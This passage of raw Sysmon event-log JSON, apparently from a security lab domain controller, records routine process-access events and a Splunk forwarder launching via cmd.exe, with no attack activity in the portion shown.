C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010545C0300}\r\nTargetProcessId: 3752\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010545C0300}","TargetProcessId":"3752","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.224\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010545C0300}\r\nSourceProcessId: 3752\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010D45B0300}\r\nTargetProcessId: 3744\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.224","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010545C0300}","SourceProcessId":"3752","SourceThreadId":"3772","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010D45B0300}","TargetProcessId":"3744","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.243\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-0010735D0300}\r\nProcessId: 3788\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-0010D45B0300}\r\nParentProcessId: 3744\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.243","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010735D0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010D45B0300}","ParentProcessId":"3744","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010D45B0300}\r\nSourceProcessId: 3744\r\nSourceThreadId: 3748\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010735D0300}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010D45B0300}","SourceProcessId":"3744","SourceThreadId":"3748","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010735D0300}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010735D0300}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010735D0300}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 